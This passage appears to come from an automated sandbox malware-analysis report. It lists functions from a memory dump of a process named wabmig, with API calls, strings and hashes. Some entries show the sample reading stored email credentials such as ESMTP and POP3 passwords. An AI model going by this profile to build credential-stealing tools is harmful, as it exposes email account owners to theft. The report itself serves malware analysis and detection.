                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: Cursor_mbsicmpqsort
                                                                            • String ID: /nosort$/sort
                                                                            • API String ID: 882979914-1578091866
                                                                            • Opcode ID: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                                            • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                                                            • Opcode Fuzzy Hash: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                                            • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
                                                                            Function 00410DBB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,00410DCA,00000104), ref: 00410D1C
                                                                              • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                                            • memset.MSVCRT ref: 00410E10
                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                            • _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                              • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                            Strings
                                                                            • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                            • API String ID: 889583718-2036018995
                                                                            • Opcode ID: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                                            • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                                                            • Opcode Fuzzy Hash: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                                            • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
                                                                            Function 00410C68 Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                                                                            • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                                                                            • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                                                                            • LockResource.KERNEL32(00000000), ref: 00410CA1
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: Resource$FindLoadLockSizeof
                                                                            • String ID:
                                                                            • API String ID: 3473537107-0
                                                                            • Opcode ID: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                                            • Instruction ID: 06b8370cebe37c7de172ca18b7cbf64f7437cd91f528590ddf6fb1777473d23a
                                                                            • Opcode Fuzzy Hash: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                                            • Instruction Fuzzy Hash: 090196367012166F8B185F69DD9489F7EAEFB853913084136FC05C6361EB71C9818ED8
                                                                            Function 004109CF Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 004109F7
                                                                              • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                                              • Part of subcall function 004075CD: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00407618
                                                                            • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                                            • memset.MSVCRT ref: 00410A32
                                                                            • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                            • String ID:
                                                                            • API String ID: 3143880245-0
                                                                            • Opcode ID: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                                            • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                                                            • Opcode Fuzzy Hash: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                                            • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
                                                                            Function 00408D34 Relevance: 5.0, APIs: 4, Instructions: 36COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ??2@YAPAXI@Z.MSVCRT(00008000,00408DC4,00403F8E,0044C530), ref: 00408D5C
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00008000,00408DC4,00403F8E,0044C530), ref: 00408D7A
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00403F8E,0044C530), ref: 00408D98
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00403F8E,0044C530), ref: 00408DA8
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ??2@
                                                                            • String ID:
                                                                            • API String ID: 1033339047-0
                                                                            • Opcode ID: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                                            • Instruction ID: b7305a6f8e60e4354fc193aeb8e5872e67636dbc7b7f4d43fc505f02bd19535d
                                                                            • Opcode Fuzzy Hash: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                                            • Instruction Fuzzy Hash: EEF031F05433615EEB559F34ED0672536A4E784302F024B3EE2059A2E6EB78D4908B09
                                                                            Function 00406F30 Relevance: 3.8, APIs: 3, Instructions: 38COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • malloc.MSVCRT ref: 00406F4C
                                                                            • memcpy.MSVCRT(00000000,00000000,?,00000000,?,004045BE,00000001,?,?,00000000,00401B21,?), ref: 00406F64
                                                                            • free.MSVCRT ref: 00406F6D
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: freemallocmemcpy
                                                                            • String ID:
                                                                            • API String ID: 3056473165-0
                                                                            • Opcode ID: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
                                                                            • Instruction ID: 20c18abb4fba39fec419649699297209b7413d51c31022bf8d4f5bc21a778af6
                                                                            • Opcode Fuzzy Hash: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
                                                                            • Instruction Fuzzy Hash: 39F0E9726092235FD7089E7AB881D0BB3ADEF94324711482FF445E7281D738EC60C6A8
                                                                            Function 00407088 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                              • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,?,?,00000000,0000003C,?,?,00401018,MS Sans Serif,0000000A,00000001), ref: 00407011
                                                                            • CreateFontIndirectA.GDI32(?), ref: 004070A6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFontIndirect_mbscpymemset
                                                                            • String ID: Arial
                                                                            • API String ID: 3853255127-493054409
                                                                            • Opcode ID: a9edf0add2530cae1e73dc887b0500a6e6731c557fb9a9d8b72d1c15ab1f178d
                                                                            • Instruction ID: 3e85f73e1de40fb669f60d67ce34a2ecc2b5129f84855d11383e820b071861b9
                                                                            • Opcode Fuzzy Hash: a9edf0add2530cae1e73dc887b0500a6e6731c557fb9a9d8b72d1c15ab1f178d
                                                                            • Instruction Fuzzy Hash: FDD0C9A0E4020D67D710F7A0FD47F49776C5B00604F510831B905F10E1EAA4A1184A99
                                                                            Function 0044B3CF Relevance: 3.1, APIs: 2, Instructions: 100COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ProtectVirtual
                                                                            • String ID:
                                                                            • API String ID: 544645111-0
                                                                            • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                            • Instruction ID: 9d5022db8ba3b04779ac2e9664088e7462d9cf1087a2f4409b49694314ac1291
                                                                            • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                            • Instruction Fuzzy Hash: FB21F7114496816FFB218BB84C017B67BD8DB13364F19469BE184CB243D76CD85693FA
                                                                            Function 0040CE70 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                                              • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                                              • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                                              • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                                              • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                                            • _strcmpi.MSVCRT ref: 0040CEC3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: strlen$_strcmpimemset
                                                                            • String ID: /stext
                                                                            • API String ID: 520177685-3817206916
                                                                            • Opcode ID: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                                            • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                                                            • Opcode Fuzzy Hash: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                                            • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                                                                            Function 0044B40E Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ProtectVirtual
                                                                            • String ID:
                                                                            • API String ID: 544645111-0
                                                                            • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                            • Instruction ID: 5df47aada64e755ddaac71019e2cddcac14d14db73bdb0f929895f2225ac57a9
                                                                            • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                            • Instruction Fuzzy Hash: DB012D01545A4179FF21AAB50C02ABB5F8CDA23364B145B4BF750CB293DB5CC90693FE
                                                                            Function 0044B42B Relevance: 3.1, APIs: 2, Instructions: 54memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                            • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ProtectVirtual
                                                                            • String ID:
                                                                            • API String ID: 544645111-0
                                                                            • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                            • Instruction ID: 565c9894d902a96607ae12053a83652f4dbbb150929c791eaa1536a67b179355
                                                                            • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                            • Instruction Fuzzy Hash: 83F0C201589A407DFE2155B50C42ABB5B8CCA27320B244B07F654CB383D79DC91A93FA
                                                                            Function 00404734 Relevance: 3.0, APIs: 2, Instructions: 24libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                            • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: Library$AddressFreeLoadProc
                                                                            • String ID:
                                                                            • API String ID: 145871493-0
                                                                            • Opcode ID: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                                            • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                                                            • Opcode Fuzzy Hash: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                                            • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                                                            Function 00410A6B Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                                              • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                                              • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                                              • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: PrivateProfile$StringWrite_itoamemset
                                                                            • String ID:
                                                                            • API String ID: 4165544737-0
                                                                            • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                            • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                                                            • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                            • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                                                            Function 00404785 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: FreeLibrary
                                                                            • String ID:
                                                                            • API String ID: 3664257935-0
                                                                            • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                            • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                                                            • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                            • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                                                            Function 00406D1A Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040AEA3,00000000), ref: 00406D2C
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                            • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                                                            • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                            • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                                                            Function 004107F1 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: FreeLibrary
                                                                            • String ID:
                                                                            • API String ID: 3664257935-0
                                                                            • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                            • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                                                            • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                            • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                                                            Function 00410CF3 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • EnumResourceNamesA.KERNEL32(?,?,Function_00010C68,00000000), ref: 00410D02
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: EnumNamesResource
                                                                            • String ID:
                                                                            • API String ID: 3334572018-0
                                                                            • Opcode ID: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                                            • Instruction ID: 5afcab74deb5f1f746bbc86617496166ce7982b7e139a3a4a0d32d3f52cd2e16
                                                                            • Opcode Fuzzy Hash: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                                            • Instruction Fuzzy Hash: 05C09B3119534197C7519F108C4DF1B7695BB59706F144D297191940A4D7514054DE05
                                                                            Function 00407F90 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: CloseFind
                                                                            • String ID:
                                                                            • API String ID: 1863332320-0
                                                                            • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                            • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                                                            • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                            • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                                                            Function 00410A9C Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: Open
                                                                            • String ID:
                                                                            • API String ID: 71445658-0
                                                                            • Opcode ID: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                                            • Instruction ID: dc05f55a30c25c5fac933af4dde5d03becff9f0601af4caa575784a6c8c77920
                                                                            • Opcode Fuzzy Hash: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                                            • Instruction Fuzzy Hash: F4C09B35545301FFDE114F40FD45F09BB61AB84B05F004414B244240B182714414EB17
                                                                            Function 00406F81 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: AttributesFile
                                                                            • String ID:
                                                                            • API String ID: 3188754299-0
                                                                            • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                            • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                                                                            • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                            • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00

                                                                            Non-executed Functions

                                                                            Function 004033F0 Relevance: 7.6, Strings: 6, Instructions: 61COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: PrivateProfileString_mbscmpstrlen
                                                                            • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                            • API String ID: 3963849919-1658304561
                                                                            • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                            • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                                                                            • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                            • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                                                                            Function 00401060 Relevance: 39.2, APIs: 26, Instructions: 186COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                                            • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                                            • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                                            • LoadCursorA.USER32(00000067), ref: 0040115F
                                                                            • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                                            • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                                            • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                                            • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                                            • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                                            • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                                            • EndDialog.USER32(?,00000001), ref: 0040121A
                                                                            • DeleteObject.GDI32(?), ref: 00401226
                                                                            • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                                            • ShowWindow.USER32(00000000), ref: 00401253
                                                                            • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                                            • ShowWindow.USER32(00000000), ref: 00401262
                                                                            • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                                            • memset.MSVCRT ref: 0040128E
                                                                            • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                                            • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                                            • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                                            • String ID:
                                                                            • API String ID: 2998058495-0
                                                                            • Opcode ID: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                                            • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                                                            • Opcode Fuzzy Hash: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                                            • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                                                            Function 0041108D Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 101COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: _mbscat$memsetsprintf$_mbscpy
                                                                            • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                            • API String ID: 633282248-1996832678
                                                                            • Opcode ID: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                                            • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
